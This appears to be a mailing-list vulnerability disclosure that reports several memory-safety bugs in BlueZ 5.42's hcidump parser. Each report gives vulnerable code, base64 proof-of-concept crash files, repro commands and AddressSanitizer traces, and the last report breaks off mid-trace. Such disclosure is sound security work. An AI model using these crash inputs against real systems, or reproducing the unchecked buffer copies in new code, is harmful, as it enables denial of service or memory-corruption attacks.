Hello list, I have been playing with hcidump tool recently and came across following bugs coming from either out-of-bound reads or buffer overflows (see attached reports). There are couple more I`m working on and will send these later. Cheers,
Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: A out-of-bound read was identified in "amp_dump_chanlist" function in "tools/parser/amp.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: IAAqBfcQ/6LNFQA0AgUgFwIXAAEAERkgAE8VAf///4AcBADrAAACANIAAAABAAA9PggAav8HAD4+ IAAp2RlAAKKA0zQ0AgAAAAEXAAEABf9WAAAAIBkFAAEQAAAANPVq/wcAPj4gACnZGUAAooDTFTQC AAAAARcAAQAF/1YAAAAgGQIAARAAAAA09fECFw4CAAEAAH8VAADe////6EABANM9Pgj3gP8HAD4+ IAAp+BlAAKKA0xU0AgAA8wEyAAMABf9WAAAAIBkNAAEQXQAANPXxAhcOAgABAAB/FQAAAAAAAABA AQDTPT4IAID/BwA+PiAAKfgZQACiatMnNAIAGgDTPT4IAID+/QA+PiAACvgAGR8AA9EBAD4A/wA4 GhAA Affected code: 45 for (i = 0; i < num; i++) { 46 triplet = &chan_list->triplets[i]; 47 48 p_indent(level+2, 0); 49 50 if (triplet->chans.first_channel >= 201) { 51 printf("Reg ext id %d reg class %d coverage class %d\n", 52 triplet->ext.reg_extension_id, 53 triplet->ext.reg_class, 54 triplet->ext.coverage_class); 55 } else { 56 if (triplet->chans.num_channels == 1) 57 Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==27923==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000eff6 at pc 0x4a8615 bp 0x792d80053ec0 sp 0x792d80053eb8 READ of size 1 at 0x60600000eff6 thread T0 #0 0x4a8614 in amp_dump_chanlist tools/parser/amp.c:50 #1 0x4a8d58 in amp_assoc_dump tools/parser/amp.c:97 #2 0x492df4 in a2mp_create_req tools/parser/l2cap.c:1183 #3 0x492df4 in l2cap_parse tools/parser/l2cap.c:1382 #4 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624 #5 0x479c9c in acl_dump tools/parser/hci.c:4041 #6 0x479c9c in hci_dump tools/parser/hci.c:4120 #7 0x4035d4 in parse tools/parser/parser.h:260 #8 0x4035d4 in read_dump tools/hcidump.c:425 #9 0x4035d4 in main tools/hcidump.c:810 #10 0x71c2389e7b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #11 0x40529e (/opt/bluez/tools/hcidump+0x40529e) 0x60600000eff6 is located 0 bytes to the right of 54-byte region [0x60600000efc0,0x60600000eff6) allocated by thread T0 here: #0 0x71c238dc573f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f) #1 0x4a50e7 in l2cap_dump tools/parser/l2cap.c:1581 #2 0x1f SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/amp.c:50 amp_dump_chanlist Shadow bytes around the buggy address: 0x0c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c0c7fff9df0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00[06]fa 0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==27923==ABORTING
Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: An out-of-bound read was observed in "ba2str" function in "bluetooth.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: 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 PhcEGjgA/+gDGj66AH8EAQASJD4+WBo+ug== Affected code: 77 int ba2str(const bdaddr_t *ba, char *str) 78 { 79 return sprintf(str, "%2.2X:%2.2X:%2.2X:%2.2X:%2.2X:%2.2X", 80 ba->b[5], ba->b[4], ba->b[3], ba->b[2], ba->b[1], ba->b[0]); 81 } Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==19853==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f778 at pc 0x580ae5 bp 0x7342a57f5cf0 sp 0x7342a57f5ce8 READ of size 1 at 0x61b00001f778 thread T0 #0 0x580ae4 in ba2str lib/bluetooth.c:80 #1 0x43f407 in p_ba2str tools/parser/parser.h:159 #2 0x43f407 in extended_inq_result_dump tools/parser/hci.c:3512 #3 0x481246 in event_dump tools/parser/hci.c:3963 #4 0x481246 in hci_dump tools/parser/hci.c:4116 #5 0x4035d4 in parse tools/parser/parser.h:260 #6 0x4035d4 in read_dump tools/hcidump.c:425 #7 0x4035d4 in main tools/hcidump.c:810 #8 0x72dfc0e31b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #9 0x40529e (/opt/bluez/tools/hcidump+0x40529e) 0x61b00001f778 is located 28 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c) allocated by thread T0 here: #0 0x72dfc120f73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f) #1 0x402f12 in read_dump tools/hcidump.c:288 #2 0x402f12 in main tools/hcidump.c:810 SUMMARY: AddressSanitizer: heap-buffer-overflow lib/bluetooth.c:80 ba2str Shadow bytes around the buggy address: 0x0c367fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c367fffbee0: 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa[fa] 0x0c367fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==19853==ABORTING
Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: An buffer overflow was observed in "commands_dump" function in "tools/parser/csr.c" source file. The issue exist because "commands" array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame "frm->ptr" parameter. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: IAAqEAAQACDNAAIEAg7/AAEQEJABgEUKAAAD6LcAIP4GhwH/5mB5f3ME2wABABYaPhI+uj66AGUE WQApP0Y+hRo+ugADBP8AggUSEhISEgNwIOkGAQD/f84AGBo+uvwDBAED6D4+PlgAAR8AA+YBPj5I Gj662AMEAQD/nAAAA+YBAAADBAEAEiPlAAEAPrrYAwQBAP9/AAAYGj4AABgBAQAzJD4+WP8ButgD hAEHEj4+PTwaOroAAwQBADA+Pj5YAAEfAAMAAQA+AAQaOBo+uvgDBAEAZAA+Uxo+utgDBD4+WAAB HwAD5gEAPpfT/wA= Affected code: 143 static inline void commands_dump(int level, char *str, struct frame *frm) 144 { 145 unsigned char commands[64]; 146 unsigned int i; 147 148 memcpy(commands, frm->ptr, frm->len); 149 150 p_indent(level, frm); 151 printf("%s: commands", str); 152 for (i = 0; i < frm->len; i++) 153 printf(" 0x%02x", commands[i]); 154 printf("\n"); 155 } Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==20429==ERROR: AddressSanitizer: unknown-crash on address 0x7fc28f471400 at pc 0x570527 bp 0x7fc28f471250 sp 0x7fc28f471248 WRITE of size 69 at 0x7fc28f471400 thread T0 #0 0x570526 in commands_dump tools/parser/csr.c:148 #1 0x570526 in pskey_dump tools/parser/csr.c:284 #2 0x576cae in bccmd_dump tools/parser/csr.c:496 #3 0x57d48a in csr_dump tools/parser/csr.c:569 #4 0x482b5e in event_dump tools/parser/hci.c:3823 #5 0x482b5e in hci_dump tools/parser/hci.c:4116 #6 0x4035d4 in parse tools/parser/parser.h:260 #7 0x4035d4 in read_dump tools/hcidump.c:425 #8 0x4035d4 in main tools/hcidump.c:810 #9 0x71b152861b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #10 0x40529e (/opt/bluez/tools/hcidump+0x40529e) Address 0x7fc28f471400 is located in stack of thread T0 at offset 384 in frame #0 0x5661ff in pskey_dump tools/parser/csr.c:239 This frame has 6 object(s): [32, 38) 'b' [96, 104) 'features' [160, 168) 't' [224, 242) 'addr' [288, 344) 'tm' [384, 448) 'commands' <== Memory access at offset 384 partially overflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: unknown-crash tools/parser/csr.c:148 commands_dump Shadow bytes around the buggy address: 0x0ff8d1e86230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff8d1e86240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff8d1e86250: f1 f1 f1 f1 06 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4 0x0ff8d1e86260: f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 00 02 f4 0x0ff8d1e86270: f2 f2 f2 f2 00 00 00 00 00 00 00 f4 f2 f2 f2 f2 =>0x0ff8d1e86280:[00]00 00 00 00 00 00 00 f3 f3 f3 f3 00 00 00 00 0x0ff8d1e86290: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 0x0ff8d1e862a0: 00 f4 f4 f4 f2 f2 f2 f2 00 00 00 00 00 00 00 f4 0x0ff8d1e862b0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 0x0ff8d1e862c0: f1 f1 f1 f1 06 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4 0x0ff8d1e862d0: f2 f2 f2 f2 00 00 02 f4 f2 f2 f2 f2 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==20429==ABORTING
Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: A use-after-free was identified in "conf_opt" function in "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: IAAIl48QJQQEBIAEBAzyAJCQj0QAkJ6P9gEAkJAT0yAA6v8A/3+PfwAAAQABAAA9PggAav8HAD4+ IAAp2RlAAKKA0xU0AgAAAAEQAAEABf9WAAAAIBkCAAEQAAAANABq/wcAPj4gACnZGUAAooDTFTQC AAAAARcAAQAF/1YAAAAgGQIAARAAAAA49fECFw4CAAEAAH8VAAD79v8AAEABANM9PggAgP8HAAU+ IAAp+BlAAKKA0xU0AgAA8wEyAAEABf//fxoAIBkCAAEQAAAANPXxAhcOAgABAAB/FQAAAAAAAABA AQDTPT4IAID/BwA+PiAAKfgZQACigNMVNAIAGgDTPT4KAID/BwA+PiAAKfgAARAAAAAABQABAAA9 Pv//AAABFwABAAX/VgAA Affected code: 636 static void conf_opt(int level, void *ptr, int len, int in, uint16_t handle, 637 uint16_t cid) 638 { 639 int indent = 0; 640 p_indent(level, 0); 641 while (len > 0) { 642 l2cap_conf_opt *h = ptr; 643 644 ptr += L2CAP_CONF_OPT_SIZE + h->len; 645 len -= L2CAP_CONF_OPT_SIZE + h->len; 646 647 if (h->type & 0x80) 648 printf("["); 649 650 if (indent++) { 651 printf("\n"); 652 p_indent(level, 0); 653 } Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==27419==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000efd4 at pc 0x48d77a bp 0x72b7bc0bf2b0 sp 0x72b7bc0bf2a8 READ of size 1 at 0x60600000efd4 thread T0 #0 0x48d779 in conf_opt tools/parser/l2cap.c:644 #1 0x498a05 in conf_rsp tools/parser/l2cap.c:781 #2 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256 #3 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624 #4 0x479c9c in acl_dump tools/parser/hci.c:4041 #5 0x479c9c in hci_dump tools/parser/hci.c:4120 #6 0x4035d4 in parse tools/parser/parser.h:260 #7 0x4035d4 in read_dump tools/hcidump.c:425 #8 0x4035d4 in main tools/hcidump.c:810 #9 0x6f259422cb44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #10 0x40529e (/opt/bluez/tools/hcidump+0x40529e) 0x60600000efd4 is located 20 bytes inside of 50-byte region [0x60600000efc0,0x60600000eff2) freed by thread T0 here: #0 0x6f259460a527 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54527) #1 0x483696 in read_remote_version_complete_dump tools/parser/hci.c:3200 #2 0x483696 in event_dump tools/parser/hci.c:3902 #3 0x483696 in hci_dump tools/parser/hci.c:4116 previously allocated by thread T0 here: #0 0x6f259460a73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f) #1 0x58f374 in hci_uint2str lib/hci.c:100 #2 0x58f374 in lmp_vertostr lib/hci.c:675 SUMMARY: AddressSanitizer: heap-use-after-free tools/parser/l2cap.c:644 conf_opt Shadow bytes around the buggy address: 0x0c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 =>0x0c0c7fff9df0: 00 00 06 fa fa fa fa fa fd fd[fd]fd fd fd fd fa 0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c0c7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==27419==ABORTING
Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: An buffer overflow was observed in "l2cap_dump" function in "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: BAAqBRkQAKLNFRU0AgIHFwIXAAEABRkgAAAANAI9WAY+uugDPj4+WBo6utgDBAEA/5wAADgaProA AwQB Affected code: 1570 } 1571 1572 if (!(fr = get_frame(frm->handle))) { 1573 fprintf(stderr, "Not enough connection handles\n"); 1574 raw_dump(level, frm); 1575 return; 1576 } 1577 1578 if (fr->data) 1579 free(fr->data); 1580 1581 if (!(fr->data = malloc(dlen + L2CAP_HDR_SIZE))) { 1582 perror("Can't allocate L2CAP reassembly buffer"); 1583 return; 1584 } 1585 memcpy(fr->data, frm->ptr, frm->len); 1586 fr->data_len = dlen + L2CAP_HDR_SIZE; 1587 fr->len = frm->len; 1588 fr->ptr = fr->data; 1589 fr->dev_id = frm->dev_id; 1590 fr->in = frm->in; Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==17644==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f75c at pc 0x79c51d04e792 bp 0x79f5616c33d0 sp 0x79f5616c2b90 READ of size 4294967295 at 0x61b00001f75c thread T0 #0 0x79c51d04e791 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e791) #1 0x4a52d2 in l2cap_dump tools/parser/l2cap.c:1585 #2 0x479c9c in acl_dump tools/parser/hci.c:4041 #3 0x479c9c in hci_dump tools/parser/hci.c:4120 #4 0x4035d4 in parse tools/parser/parser.h:260 #5 0x4035d4 in read_dump tools/hcidump.c:425 #6 0x4035d4 in main tools/hcidump.c:810 #7 0x79c51cc96b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #8 0x40529e (/opt/bluez/tools/hcidump+0x40529e) 0x61b00001f75c is located 0 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c) allocated by thread T0 here: #0 0x79c51d07473f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f) #1 0x402f12 in read_dump tools/hcidump.c:288 #2 0x402f12 in main tools/hcidump.c:810 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ?? Shadow bytes around the buggy address: 0x0c367fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c367fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c367fffbee0: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa 0x0c367fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Contiguous container OOB:fc ASan internal: fe ==17644==ABORTING
Machine: x86_64 OS: linux-gnu Compiler: gcc Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address Machine Type: x86_64-unknown-linux-gnu BlueZ Version: 5.42 Release Status: release Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz Description: An out-of-bound read was observed in "le_meta_ev_dump" function in "tools/parser/hci.c" source file. This issue exist becuase 'subevent' which is used to read correct element from 'ev_le_meta_str' array is overflown. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command: ./tools/hcidump -a -r <PoC File> PoC.file base64 encoded: IAAQ/xjyQAToA4AEBAxbAJD//0kDAKSQIAAgAQb/yyIAgAAB/3+Pf0siSgABABI+Pj5YGj662AME BwASPgBkPBo+ugADBAEAMD4+PkkAAR8AA+YBAD4IBBo+ABC62AMEAQAwPllVWAABHwAD5gEAPgAE Gj5APv//AwQBAAU+Pj1YJz668AMEAQASPj4+WBo+utgDBAEA/38A6RcaProAAwQBABIkPj5YGj66 2BAEAQA7//+6AIMEAQASJD4fWAABAQA+HwQaPkA= Affected code: 3659 static inline void le_meta_ev_dump(int level, struct frame *frm) 3660 { 3661 evt_le_meta_event *mevt = frm->ptr; 3662 uint8_t subevent; 3663 3664 subevent = mevt->subevent; 3665 3666 frm->ptr += EVT_LE_META_EVENT_SIZE; 3667 frm->len -= EVT_LE_META_EVENT_SIZE; 3668 3669 p_indent(level, frm); 3670 printf("%s\n", ev_le_meta_str[subevent]); 3671 3672 switch (mevt->subevent) { 3673 case EVT_LE_CONN_COMPLETE: 3674 evt_le_conn_complete_dump(level + 1, frm); 3675 break; 3676 case EVT_LE_ADVERTISING_REPORT: 3677 evt_le_advertising_report_dump(level + 1, frm); 3678 break; 3679 case EVT_LE_CONN_UPDATE_COMPLETE: 3680 evt_le_conn_update_complete_dump(level + 1, frm); 3681 break; 3682 case EVT_LE_READ_REMOTE_USED_FEATURES_COMPLETE: 3683 evt_le_read_remote_used_features_complete_dump(level + 1, frm); 3684 break; 3685 default: 3686 raw_dump(level, frm); 3687 break; 3688 } 3689 } Repeat-By: echo <above base64> > PoC.64 base64 -d PoC.b64 > PoC.file valgrind ./tools/hcidump -a -r PoC.file ASAN Report (bluez needs to compiled with -fsanitize=address for this): ==30076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000005bd780 at pc 0x48701d bp 0x7d1fca13a5c0 sp 0x7d1fca13a5b8 READ of size 8 at 0x0000005bd780 thread T0 #0 0x48701c in le_meta_ev_dump tools/parser/hci.c:3670 #1 0x48701c in event_dump tools/parser/hci.c:3991 #2 0x48701c in hci_dump tools/parser/hci.c:4116 #3 0x4035d4 in parse tools/parser/parser.h:260 #4 0x4035d4 in read_dump tools/hcidump.c:425 #5 0x4035d4 in main tools/hcidump.c:810 #6 0x7bf781766b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44) #7 0x40529e (/opt/bluez/tools/hcidump+0x40529e) 0x0000005bd780 is located 15 bytes to the right of global variable '*.LC615' from 'tools/parser/hci.c' (0x5bd760) of size 17 '*.LC615' is ascii string 'Inquiry Complete' 0x0000005bd780 is located 32 bytes to the left of global variable '*.LC616' from 'tools/parser/hci.c' (0x5bd7a0) of size 15 '*.LC616' is ascii string 'Inquiry Result' SUMMARY: AddressSanitizer: global-buffer-overflow tools/parser/hci.c:3670 le_meta_ev_dump Shadow bytes around the buggy address: 0x0000800afaa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 f9 f9 0x0000800afab0: f9 f9 f9 f9 00 00 07 f9 f9 f9 f9 f9 00 00 06 f9 0x0000800afac0: f9 f9 f9 f9 00 00 00 06 f9 f9 f9 f9 00 00 00 00 0x0000800afad0: 06 f9 f9 f9 f9 f9 f9 f9 00 00 00 01 f9 f9 f9 f9 0x0000800afae0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9 00 